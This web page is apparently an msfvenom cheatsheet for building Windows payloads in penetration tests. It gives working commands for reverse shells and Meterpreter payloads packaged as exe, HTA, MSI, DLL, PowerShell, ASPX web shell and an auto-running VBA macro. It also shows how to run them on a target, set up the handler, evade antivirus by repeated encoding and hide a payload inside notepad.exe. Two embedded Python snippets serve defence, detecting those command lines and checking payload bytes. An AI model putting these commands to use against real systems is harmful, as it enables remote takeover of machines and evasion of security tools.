msfvenom cheatsheet - Advanced Windows Payload Generation Techniques with Msfvenom

Advanced Windows Payload Generation, Comprehensive guide for security professionals using Msfvenom to create and customize test payloads with detailed

Introduction

In the field of cybersecurity, particularly for security professionals conducting authorized penetration testing and security assessments, creating effective test payloads is essential. Msfvenom, a component of the Metasploit Framework, is a powerful utility designed for this purpose. This comprehensive guide explores advanced techniques for creating Windows payloads for security testing, with detailed explanations of commands, outputs, and best practices.

Understanding Msfvenom

Msfvenom combines the functionality of the legacy msfpayload and msfencode utilities into a single, streamlined tool. It allows security professionals to generate various payload types with customizable options for authorized testing scenarios.

Basic Syntax

msfvenom -p <payload> [options]

Command Components:

  • -p: Specifies the payload type
  • [options]: Additional parameters that customize the payload

Example with Output:

$ msfvenom --list payloads | grep windows
windows/dllinject/bind_hidden_ipknock_tcp  Listens for a connection from a hidden port...
windows/dllinject/bind_hidden_tcp          Listens for a connection from a hidden port...
...

Understanding Payload Types

Staged vs. Stageless Payloads

Staged Payloads

These consist of an initial small payload (stager) that connects back to establish a channel for downloading the larger payload (stage).

Naming Convention: Contains a single slash (e.g., windows/meterpreter/reverse_tcp)

Stageless Payloads

These contain the entire payload in a single package, eliminating the need for additional downloads.

Naming Convention: Contains an underscore (e.g., windows/meterpreter_reverse_tcp)

Command to List All Windows Payloads:

$ msfvenom --list payloads | grep windows

Comprehensive Windows Payload Generation Techniques

1. Windows Executable (.exe)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f exe -o shell.exe

Command Breakdown:

  • -p windows/shell_reverse_tcp: Uses a stageless reverse TCP shell payload
  • LHOST=192.168.1.3: Sets the listener host IP address
  • LPORT=443: Sets the listener port (using 443 to blend with HTTPS traffic)
  • -f exe: Sets the output format as a Windows executable
  • -o shell.exe: Specifies the output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.exe

Execution Method on Target: Run shell.exe directly

Listener Configuration:

$ nc -lvp 443
listening on [any] 443 ...

2. PowerShell Batch File (.bat)

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.3 LPORT=443 -f raw -o shell.bat

Command Breakdown:

  • -p cmd/windows/reverse_powershell: Uses a PowerShell-based reverse shell
  • LHOST=192.168.1.3: Sets the listener host IP address
  • LPORT=443: Sets the listener port
  • -f raw: Outputs raw text format
  • -o shell.bat: Saves as a batch file

Expected Output:

No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 1582 bytes
Saved as: shell.bat

Execution Method: Double-click or run the batch file on the target system

Listener Output Example:

$ nc -lvp 443
listening on [any] 443 ...
connect to [192.168.1.3] from (UNKNOWN) [192.168.1.5] 49213
Microsoft Windows [Version 10.0.19045.3693]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Users\testuser\Desktop>

3. HTML Application Payload (.hta)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f hta-psh -o shell.hta

Command Breakdown:

  • -p windows/shell_reverse_tcp: Standard reverse shell payload
  • -f hta-psh: Creates an HTA file with embedded PowerShell
  • -o shell.hta: Saves as an HTA file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.hta

Hosting Method:

$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
192.168.1.5 - - [08/May/2025 10:15:32] "GET /shell.hta HTTP/1.1" 200 -

Execution on Target:

mshta http://192.168.1.3/shell.hta

4. Microsoft Installer Payload (.msi)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f msi -o shell.msi

Command Breakdown:

  • -p windows/shell_reverse_tcp: Standard reverse shell payload
  • -f msi: Creates a Microsoft Installer package
  • -o shell.msi: Saves as an MSI file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.msi

Execution Method:

msiexec /quiet /qn /i shell.msi

Parameters Explained:

  • /quiet: Suppresses UI
  • /qn: No UI
  • /i: Install mode

5. Windows DLL Payload (.dll)

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.3 LPORT=443 -f dll -o shell.dll

Command Breakdown:

  • -f dll: Creates a Windows DLL file
  • -o shell.dll: Specifies the output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: shell.dll

Execution Method:

rundll32.exe shell.dll,0

Command Explanation: The rundll32.exe utility executes the DLL at export function #0

6. PowerShell Command Payload

msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.1.3 LPORT=443 -f psh-cmd

Command Breakdown:

  • -f psh-cmd: Format as PowerShell command
  • No output file specified, displays to console

Example Output:

powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALA[...]

Execution Method: Copy the output and paste it into PowerShell on the target

7. PowerShell Script Payload (.ps1)

msfvenom -p windows/x64/meterpreter_reverse_https LHOST=192.168.1.3 LPORT=443 -f psh -o shell.ps1

Command Breakdown:

  • -p windows/x64/meterpreter_reverse_https: 64-bit stageless Meterpreter payload over HTTPS
  • -f psh: PowerShell script format
  • -o shell.ps1: Saves as a PS1 file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: shell.ps1

Execution Method:

powershell -ExecutionPolicy Bypass -File .\shell.ps1

Metasploit Handler Setup:

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
payload => windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 192.168.1.3
LHOST => 192.168.1.3
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > run

[*] Started HTTPS reverse handler on https://192.168.1.3:443
[*] Meterpreter session 1 opened (192.168.1.3:443 -> 192.168.1.5:49802)

meterpreter > getuid
Server username: DESKTOP-ABC123\User
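Every execution method shown above (mshta fetching a remote HTA, a quiet msiexec install, rundll32 called with a numeric entry point, PowerShell started hidden with -e or with -ExecutionPolicy Bypass -File) leaves a process-creation command line that a defender can match. The Python below is an added example written for this page, not code from the page or from Metasploit; the log format (timestamp|user|image|commandline), the sample lines and the rule names are constructed for illustration, and the -e decoding relies only on PowerShell's documented -EncodedCommand format (base64 of the UTF-16LE script).

```python
"""Flag process-creation command lines matching the execution patterns on this page.
Constructed example: log format, sample lines and rule names are made up."""
import base64
import re

# Each rule is (name, regex over the raw command line). Lookaheads let the
# switches appear in any order, which is how they show up in real logs.
RULES = [
    ("mshta_remote_hta",
     re.compile(r'\bmshta(?:\.exe)?\s+"?https?://', re.I)),
    ("msiexec_quiet_install",
     re.compile(r"\bmsiexec(?:\.exe)?\b(?=.*\s/i\b)(?=.*\s/q(?:n|uiet)\b)", re.I)),
    ("rundll32_numeric_entry",
     re.compile(r"\brundll32(?:\.exe)?\s+\S+\.dll,\s*\d+\b", re.I)),
    ("powershell_hidden_encoded",
     re.compile(r"\bpowershell(?:\.exe)?\b(?=.*\s-(?:w|windowstyle)\s+hidden\b)"
                r"(?=.*\s-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})", re.I)),
    ("powershell_bypass_file",
     re.compile(r"\bpowershell(?:\.exe)?\b(?=.*-executionpolicy\s+bypass\b)"
                r"(?=.*\s-file\s+\S+\.ps1\b)", re.I)),
]

ENCODED_ARG = re.compile(r"\s-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(cmdline):
    """Return the plaintext behind a PowerShell -e/-enc/-EncodedCommand argument,
    or None when there is none or it does not decode as base64(UTF-16LE)."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(cmdline):
    """Names of every rule the command line matches (empty list when clean)."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_log(lines):
    """Scan 'timestamp|user|image|commandline' records (constructed format) and
    return one dict per record that hit at least one rule, in log order."""
    hits = []
    for line in lines:
        parts = line.rstrip("\n").split("|", 3)
        if len(parts) != 4:
            continue  # malformed record: skip rather than crash the scan
        ts, user, image, cmd = parts
        matched = analyze(cmd)
        if matched:
            hits.append({"time": ts, "user": user, "image": image,
                         "rules": matched, "decoded": decode_encoded_command(cmd)})
    return hits


def _encode_ps(script):
    """Build a -EncodedCommand argument the way PowerShell expects it (sample data only)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed sample log; the last two lines are benign controls.
SAMPLE_LOG = [
    r"2025-05-08T10:15:40|LAB\testuser|C:\Windows\System32\mshta.exe|mshta http://192.168.1.3/shell.hta",
    r"2025-05-08T10:16:02|LAB\testuser|C:\Windows\System32\msiexec.exe|msiexec /quiet /qn /i shell.msi",
    r"2025-05-08T10:16:30|LAB\testuser|C:\Windows\System32\rundll32.exe|rundll32.exe shell.dll,0",
    r"2025-05-08T10:17:11|LAB\testuser|" + PS_IMAGE + "|powershell.exe -nop -w hidden -e "
    + _encode_ps("Write-Host 'constructed sample'"),
    r"2025-05-08T10:17:45|LAB\testuser|" + PS_IMAGE + r"|powershell -ExecutionPolicy Bypass -File .\shell.ps1",
    r"2025-05-08T10:18:00|LAB\admin|C:\Windows\System32\msiexec.exe|msiexec /i vendor_update.msi",
    r"2025-05-08T10:18:20|LAB\testuser|C:\Windows\System32\notepad.exe|notepad.exe notes.txt",
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["time"], hit["user"], ", ".join(hit["rules"]))
        if hit["decoded"] is not None:
            print("   decoded -e argument:", hit["decoded"])
```

The interactive `msiexec /i` line is deliberately not flagged: the rule requires both the install switch and a quiet switch, which keeps ordinary installs out of the alert queue. Decoding the -e argument is what turns a generic "hidden encoded PowerShell" alert into something an analyst can triage.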

8. Web Shell Payload (.aspx)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 -f aspx -o shell.aspx

Command Breakdown:

  • -p windows/x64/meterpreter/reverse_https: 64-bit staged Meterpreter payload over HTTPS
  • -f aspx: ASP.NET Web Form format
  • -o shell.aspx: Saves as an ASPX file

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: shell.aspx

Deployment: Upload to the target IIS server's web directory

When Accessed in Browser: The page appears to load but initiates the connection in the background

9. Visual Basic for Applications Payload (.vba)

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 -f vba

Command Breakdown:

  • -f vba: VBA macro format
  • No output file specified, displays macro code to console

Example Output:

'Dim Str As String
'Str = "powershell.exe -nop -w hidden -e JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwA..."
'Create object WScript.Shell and run the command
Sub AutoOpen()
  Dim Shell As Object
  Set Shell = CreateObject("wscript.shell")
  Shell.Run Str
End Sub
...

Deployment:

  • Create new Microsoft Office document
  • Open VBA editor (Alt + F11)
  • Insert a new module
  • Paste the generated code
  • Save as macro-enabled document (e.g., .docm for Word)

Advanced Evasion Techniques

1. Encoding Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 5 -f exe -o encoded_shell.exe

Command Breakdown:

  • -e x86/shikata_ga_nai: Uses the Shikata Ga Nai polymorphic encoder
  • -i 5: Applies 5 iterations of encoding
  • -f exe: Executable format
  • -o encoded_shell.exe: Output filename

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 5 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai succeeded with size 449 (iteration=3)
x86/shikata_ga_nai succeeded with size 476 (iteration=4)
x86/shikata_ga_nai chosen with final size 476
Payload size: 476 bytes
Saved as: encoded_shell.exe

Why This Works: Each encoding iteration produces a different binary signature, potentially helping bypass signature-based detection systems.

2. Using Multiple Encoders

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 3 -e x86/jmp_call_additive -i 2 -f exe -o multi_encoded.exe

Command Breakdown:

  • First applies 3 iterations of shikata_ga_nai
  • Then applies 2 iterations of jmp_call_additive
  • Creates a layered encoding pattern

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 368 (iteration=0)
x86/shikata_ga_nai succeeded with size 395 (iteration=1)
x86/shikata_ga_nai succeeded with size 422 (iteration=2)
x86/shikata_ga_nai chosen with final size 422
Attempting to encode payload with 2 iterations of x86/jmp_call_additive
x86/jmp_call_additive succeeded with size 457 (iteration=0)
x86/jmp_call_additive succeeded with size 492 (iteration=1)
x86/jmp_call_additive chosen with final size 492
Payload size: 492 bytes
Saved as: multi_encoded.exe

3. Specifying Architecture and Platform

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -a x64 --platform windows -f exe -o x64_shell.exe

Command Breakdown:

  • -a x64: Specifies 64-bit architecture
  • --platform windows: Explicitly targets Windows platform
  • Ensures compatibility with 64-bit systems

Expected Output:

[-] No encoder specified, outputting raw payload
Payload size: 510 bytes
Saved as: x64_shell.exe

4. Avoiding Bad Characters

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -b "\x00\x0a\x0d" -f exe -o no_bad_chars.exe

Command Breakdown:

  • -b "\x00\x0a\x0d": Excludes null bytes (0x00), line feeds (0x0a), and carriage returns (0x0d)
  • Useful when the payload must not contain certain byte values that might terminate strings or cause parsing issues

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 351 (iteration=0)
x86/shikata_ga_nai chosen with final size 351
Payload size: 351 bytes
Saved as: no_bad_chars.exe
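The encoder output above says it succeeded, but the practical check is to verify that the bytes msfvenom produced really contain none of the excluded values. The Python below is an added example for this page, not part of msfvenom: it parses a -b style specification such as "\x00\x0a\x0d" into a byte set and reports every offending offset in a blob (for instance a file written with -f raw). The sample blob is constructed text, not shellcode.

```python
"""Check a generated payload blob against an msfvenom-style -b bad-character list.
Constructed example; SAMPLE_BLOB is made-up text, not a real payload."""
import re
from collections import defaultdict

BADCHAR_TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})")


def parse_badchars(spec):
    """Turn a -b string such as '\\x00\\x0a\\x0d' into a set of byte values.
    \\xNN escapes are decoded; any other character is taken as a literal byte,
    which is how the shell hands an unescaped character to msfvenom."""
    result = set()
    pos = 0
    for m in BADCHAR_TOKEN.finditer(spec):
        for ch in spec[pos:m.start()]:
            _add_literal(result, ch)
        result.add(int(m.group(1), 16))
        pos = m.end()
    for ch in spec[pos:]:
        _add_literal(result, ch)
    return result


def _add_literal(result, ch):
    if ord(ch) > 0xFF:
        raise ValueError(f"{ch!r} is not a single byte")
    result.add(ord(ch))


def find_badchars(blob, bad):
    """Return {byte_value: [offsets]} for every bad byte present in blob."""
    found = defaultdict(list)
    for off, b in enumerate(blob):
        if b in bad:
            found[b].append(off)
    return dict(found)


def report(blob, spec):
    """Human-readable lines, one per bad byte value found; empty list when clean."""
    found = find_badchars(blob, parse_badchars(spec))
    lines = []
    for value in sorted(found):
        offs = ", ".join(f"0x{o:04x}" for o in found[value])
        lines.append(f"bad byte 0x{value:02x} at offset(s) {offs}")
    return lines


def check_file(path, spec):
    """Convenience wrapper for a file produced with -f raw."""
    with open(path, "rb") as fh:
        return report(fh.read(), spec)


# Constructed sample: 16 bytes of text, then a null, a line feed and a carriage return.
SAMPLE_BLOB = b"CONSTRUCTED-BLOB\x00with\x0abad\x0dbytes"

if __name__ == "__main__":
    for line in report(SAMPLE_BLOB, "\\x00\\x0a\\x0d") or ["clean: no bad bytes found"]:
        print(line)
```

Because the shell has already processed the quotes, `parse_badchars` receives the same text msfvenom would; passing the identical -b string to both keeps the check and the generation in step.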

5. Template-Based Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -x notepad.exe -k -f exe -o trojan_notepad.exe

Command Breakdown:

  • -x notepad.exe: Uses notepad.exe as a template/carrier
  • -k: Keeps the template application's functionality (runs the payload in a separate thread)
  • Creates a functioning application that also executes the payload

Expected Output:

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Using template executable: notepad.exe
Executable (template) size: 193024 bytes
Embedding payload in template and keeping original entry point
Saved as: trojan_notepad.exe

Advanced Payload Customization

1. Custom Shellcode

msfvenom -p generic/custom PAYLOADFILE=custom_shellcode.bin -a x86 --platform windows -f exe -o custom_payload.exe

Command Breakdown:

  • -p generic/custom: Uses custom shellcode
  • PAYLOADFILE=custom_shellcode.bin: Specifies the file containing custom shellcode
  • Allows integration of custom-developed shellcode

2. Custom HTTP/HTTPS Headers

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.3 LPORT=443 HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)" -f exe -o custom_ua.exe

Command Breakdown:

  • HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64)": Customizes the User-Agent header
  • Helps blend payload traffic with legitimate HTTP traffic

Additional Header Options:

  • HttpHost: Sets the Host header
  • HttpCookie: Sets Cookie header
  • HttpReferer: Sets Referer header

3. Payload Encryption and Obfuscation

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=443 -e x86/shikata_ga_nai -i 10 -f raw | msfvenom -a x86 --platform windows -e x86/countdown -i 5 -f exe -o highly_encoded.exe

Command Breakdown:

  • First command generates and encodes with shikata_ga_nai 10 times
  • Pipes output to second msfvenom command
  • Second command applies countdown encoder 5 more times
  • Creates a highly obfuscated payload that may evade detection

Security Considerations

When conducting authorized penetration testing or security assessments:

  1. Obtain Explicit Permission: Always have written authorization before generating or deploying any payloads.

  2. Establish a Testing Scope: Define clear boundaries for testing activities.

  3. Document All Actions: Maintain detailed logs of all testing activities.

  4. Clean Up After Testing: Remove all testing artifacts after assessment completion.

  5. Report Findings Responsibly: Follow responsible disclosure procedures.

Conclusion

Msfvenom is an exceptionally versatile tool for security professionals conducting authorized penetration testing. The techniques outlined in this guide demonstrate its capabilities for creating various Windows payloads with advanced customization options. By understanding these methods, security professionals can more effectively evaluate system defenses and identify potential vulnerabilities.